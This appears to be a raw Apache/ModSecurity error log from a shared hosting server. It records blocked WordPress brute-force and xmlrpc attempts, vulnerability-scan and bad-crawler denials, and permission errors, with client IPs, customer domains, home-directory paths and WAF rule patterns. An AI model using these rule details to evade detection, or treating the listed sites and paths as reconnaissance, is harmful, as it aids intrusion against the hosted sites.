[Tue May 26 18:27:58.680350 2026] [security2:error] [pid 998632:tid 998734] [remote 171.232.72.233:52002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.72.232.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWY1q1OTU2dW0MS1Em2uQAAXE4"]
[Tue May 26 18:27:59.452180 2026] [security2:error] [pid 998632:tid 998825] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY1K1OTU2dW0MS1Em2jQAAACE"]
[Tue May 26 18:28:00.031412 2026] [security2:error] [pid 998632:tid 998890] [client 18.203.176.135:5576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWY161OTU2dW0MS1Em26wAAAF0"], referer: https://www.yourstorybag.com/wp-content/cache/min/1/379d47d67c62967f57bd4fe87ab3b849.css
[Tue May 26 18:28:00.170507 2026] [security2:error] [pid 998632:tid 998830] [client 185.191.171.17:37912] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-november/day/2024-03-29/"] [unique_id "ahWY2K1OTU2dW0MS1Em28AAAACY"]
[Tue May 26 18:28:00.170670 2026] [security2:error] [pid 998632:tid 998830] [client 185.191.171.17:37912] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-november/day/2024-03-29/"] [unique_id "ahWY2K1OTU2dW0MS1Em28AAAACY"]
[Tue May 26 18:28:00.509350 2026] [security2:error] [pid 998632:tid 998759] [remote 78.142.18.172:38608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWY2K1OTU2dW0MS1Em28QAAEGY"]
[Tue May 26 18:28:02.030315 2026] [security2:error] [pid 998632:tid 998891] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY1q1OTU2dW0MS1Em2ywAAAF4"]
[Tue May 26 18:28:02.114257 2026] [security2:error] [pid 998632:tid 998794] [client 124.43.5.103:61008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWY2q1OTU2dW0MS1Em3GQAAAAM"]
[Tue May 26 18:28:02.114374 2026] [security2:error] [pid 998632:tid 998794] [client 124.43.5.103:61008] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWY2q1OTU2dW0MS1Em3GQAAAAM"]
[Tue May 26 18:28:02.387409 2026] [security2:error] [pid 998632:tid 998809] [client 34.19.37.69:52983] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "landsonlogistics.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWY2q1OTU2dW0MS1Em3HQAAABI"]
[Tue May 26 18:28:02.425941 2026] [security2:error] [pid 998632:tid 998876] [client 8.231.144.84:49399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.144.231.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWY2q1OTU2dW0MS1Em3IQAAAFE"]
[Tue May 26 18:28:02.426065 2026] [security2:error] [pid 998632:tid 998876] [client 8.231.144.84:49399] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWY2q1OTU2dW0MS1Em3IQAAAFE"]
[Tue May 26 18:28:02.617273 2026] [security2:error] [pid 998632:tid 998883] [client 8.231.144.84:65340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.144.231.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWY2q1OTU2dW0MS1Em3JgAAAFc"]
[Tue May 26 18:28:02.617399 2026] [security2:error] [pid 998632:tid 998883] [client 8.231.144.84:65340] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWY2q1OTU2dW0MS1Em3JgAAAFc"]
[Tue May 26 18:28:02.929029 2026] [security2:error] [pid 998632:tid 998921] [client 34.19.37.69:50530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.37.19.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahWY2q1OTU2dW0MS1Em3KgAAAHw"]
[Tue May 26 18:28:03.971084 2026] [security2:error] [pid 998632:tid 998657] [remote 78.142.18.172:38608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWY261OTU2dW0MS1Em3QwAAUQY"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:28:05.067290 2026] [security2:error] [pid 998632:tid 998806] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY2a1OTU2dW0MS1Em3GAAAAA8"]
[Tue May 26 18:28:06.278596 2026] [security2:error] [pid 998632:tid 998825] [client 34.19.37.69:53362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.37.19.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahWY3q1OTU2dW0MS1Em3dwAAACE"]
[Tue May 26 18:28:06.278755 2026] [security2:error] [pid 998632:tid 998825] [client 34.19.37.69:53362] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "landsonlogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahWY3q1OTU2dW0MS1Em3dwAAACE"]
[Tue May 26 18:28:06.352005 2026] [security2:error] [pid 998632:tid 998689] [remote 194.164.193.194:49042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.193.164.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY3q1OTU2dW0MS1Em3dQAAGSE"]
[Tue May 26 18:28:07.040245 2026] [security2:error] [pid 998632:tid 998667] [remote 194.164.193.194:49042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.193.164.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY3q1OTU2dW0MS1Em3owAAAw4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:28:07.751219 2026] [security2:error] [pid 998632:tid 998821] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY3K1OTU2dW0MS1Em3UAAAAB0"]
[Tue May 26 18:28:08.490645 2026] [security2:error] [pid 998632:tid 998697] [remote 47.128.47.141:56848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/medias/288-etiam-diam-magna-8"] [unique_id "ahWY4K1OTU2dW0MS1Em3ugAAXSk"]
[Tue May 26 18:28:09.506786 2026] [security2:error] [pid 998632:tid 998791] [client 181.224.184.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY3a1OTU2dW0MS1Em3bQAAAAA"]
[Tue May 26 18:28:10.303795 2026] [security2:error] [pid 998632:tid 998860] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY3q1OTU2dW0MS1Em3hAAAAEI"]
[Tue May 26 18:28:11.334522 2026] [autoindex:error] [pid 998632:tid 998851] [client 43.166.224.244:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://juniorwoodies.com
[Tue May 26 18:28:12.965261 2026] [security2:error] [pid 998632:tid 998914] [client 124.43.5.103:2824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWY5K1OTU2dW0MS1Em3_wAAAHU"]
[Tue May 26 18:28:12.965453 2026] [security2:error] [pid 998632:tid 998914] [client 124.43.5.103:2824] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWY5K1OTU2dW0MS1Em3_wAAAHU"]
[Tue May 26 18:28:13.653679 2026] [security2:error] [pid 998632:tid 998903] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY4a1OTU2dW0MS1Em3ywAAAGo"]
[Tue May 26 18:28:17.462954 2026] [security2:error] [pid 998632:tid 998842] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY5K1OTU2dW0MS1Em3_gAAADA"]
[Tue May 26 18:28:18.879036 2026] [security2:error] [pid 998632:tid 998879] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY561OTU2dW0MS1Em4KgAAAFQ"]
[Tue May 26 18:28:19.425488 2026] [security2:error] [pid 998632:tid 998815] [client 34.62.36.252:45972] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "alphaelectronics.svijaykumar.in"] [uri "/"] [unique_id "ahWY661OTU2dW0MS1Em4aAAAABg"]
[Tue May 26 18:28:19.566416 2026] [security2:error] [pid 998632:tid 998919] [client 34.53.252.202:35076] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "alphaelectronics.svijaykumar.in"] [uri "/"] [unique_id "ahWY661OTU2dW0MS1Em4aQAAAHo"]
[Tue May 26 18:28:20.096291 2026] [security2:error] [pid 998632:tid 998733] [remote 162.241.152.21:49578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY661OTU2dW0MS1Em4bQAAIE0"]
[Tue May 26 18:28:20.479558 2026] [security2:error] [pid 998632:tid 998688] [remote 162.241.152.21:49578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY7K1OTU2dW0MS1Em4mQAAbSA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:28:21.090987 2026] [security2:error] [pid 998632:tid 998853] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY6q1OTU2dW0MS1Em4UAAAADs"]
[Tue May 26 18:28:22.411810 2026] [security2:error] [pid 998632:tid 998806] [client 34.53.252.202:35866] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "shardagalaxy.com"] [uri "/"] [unique_id "ahWY7q1OTU2dW0MS1Em4vQAAAA8"]
[Tue May 26 18:28:22.571488 2026] [security2:error] [pid 998632:tid 998857] [client 34.76.107.251:53598] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "shardagalaxy.com"] [uri "/"] [unique_id "ahWY7q1OTU2dW0MS1Em4vgAAAD8"]
[Tue May 26 18:28:23.655213 2026] [security2:error] [pid 998632:tid 998862] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY7K1OTU2dW0MS1Em4owAAAEQ"]
[Tue May 26 18:28:23.686844 2026] [security2:error] [pid 998632:tid 998803] [client 124.43.5.103:28579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWY761OTU2dW0MS1Em40QAAAAw"]
[Tue May 26 18:28:23.687055 2026] [security2:error] [pid 998632:tid 998803] [client 124.43.5.103:28579] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWY761OTU2dW0MS1Em40QAAAAw"]
[Tue May 26 18:28:23.712091 2026] [security2:error] [pid 998632:tid 998866] [client 66.249.66.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWY661OTU2dW0MS1Em4YQAAAEg"]
[Tue May 26 18:28:26.541284 2026] [security2:error] [pid 998632:tid 998875] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY761OTU2dW0MS1Em41AAAAFA"]
[Tue May 26 18:28:27.784411 2026] [security2:error] [pid 998632:tid 998680] [remote 31.24.155.180:47402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY861OTU2dW0MS1Em5FwAAPxk"]
[Tue May 26 18:28:28.138404 2026] [security2:error] [pid 998632:tid 998908] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY8a1OTU2dW0MS1Em49QAAAG8"]
[Tue May 26 18:28:28.683977 2026] [security2:error] [pid 998632:tid 998912] [client 182.161.73.20:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWY9K1OTU2dW0MS1Em5KQAAAHM"]
[Tue May 26 18:28:28.684617 2026] [security2:error] [pid 998632:tid 998864] [client 182.161.73.20:57660] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWY9K1OTU2dW0MS1Em5JwAAAEY"]
[Tue May 26 18:28:29.048988 2026] [security2:error] [pid 998632:tid 998673] [remote 111.229.141.137:41578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWY9K1OTU2dW0MS1Em5LQAARxQ"]
[Tue May 26 18:28:29.891142 2026] [core:crit] [pid 998632:tid 998898] (13)Permission denied: [client 40.77.167.149:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:28:30.117036 2026] [security2:error] [pid 998632:tid 998919] [client 182.161.73.23:6894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.73.161.182.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWY9a1OTU2dW0MS1Em5RQAAAHo"]
[Tue May 26 18:28:30.117154 2026] [security2:error] [pid 998632:tid 998919] [client 182.161.73.23:6894] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "409"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWY9a1OTU2dW0MS1Em5RQAAAHo"]
[Tue May 26 18:28:30.360877 2026] [security2:error] [pid 998632:tid 998721] [remote 31.24.155.180:47402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY9q1OTU2dW0MS1Em5TwAAb0E"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:28:31.244112 2026] [security2:error] [pid 998632:tid 998693] [remote 195.250.23.247:34562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY961OTU2dW0MS1Em5XAAADSU"]
[Tue May 26 18:28:31.995770 2026] [security2:error] [pid 998632:tid 998817] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY9a1OTU2dW0MS1Em5PgAAABo"]
[Tue May 26 18:28:33.541695 2026] [security2:error] [pid 998632:tid 998895] [client 74.7.175.175:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.panda-eco.com"] [uri "/index.php"] [unique_id "ahWY-a1OTU2dW0MS1Em5eAAAAGI"]
[Tue May 26 18:28:33.541717 2026] [security2:error] [pid 998632:tid 998895] [client 74.7.175.175:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.panda-eco.com"] [uri "/index.php"] [unique_id "ahWY-a1OTU2dW0MS1Em5eAAAAGI"]
[Tue May 26 18:28:33.551038 2026] [security2:error] [pid 998632:tid 998814] [client 74.7.175.175:34242] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWY-a1OTU2dW0MS1Em5dQAAFyI"]
[Tue May 26 18:28:33.804880 2026] [security2:error] [pid 998632:tid 998911] [client 74.7.175.175:34246] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWY-a1OTU2dW0MS1Em5fgAAcj0"], referer: https://www.panda-eco.com/robots.txt
[Tue May 26 18:28:33.805393 2026] [security2:error] [pid 998632:tid 998659] [remote 123.30.233.13:55796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWY-a1OTU2dW0MS1Em5fQAALwg"]
[Tue May 26 18:28:34.349095 2026] [security2:error] [pid 998632:tid 998715] [remote 123.30.233.13:55796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWY-q1OTU2dW0MS1Em5hwAAfjs"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 18:28:34.406993 2026] [core:crit] [pid 998632:tid 998862] (13)Permission denied: [client 207.46.13.128:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:28:34.416445 2026] [security2:error] [pid 998632:tid 998921] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY961OTU2dW0MS1Em5aQAAAHw"]
[Tue May 26 18:28:34.542078 2026] [security2:error] [pid 998632:tid 998824] [client 124.43.5.103:61808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWY-q1OTU2dW0MS1Em5igAAACA"]
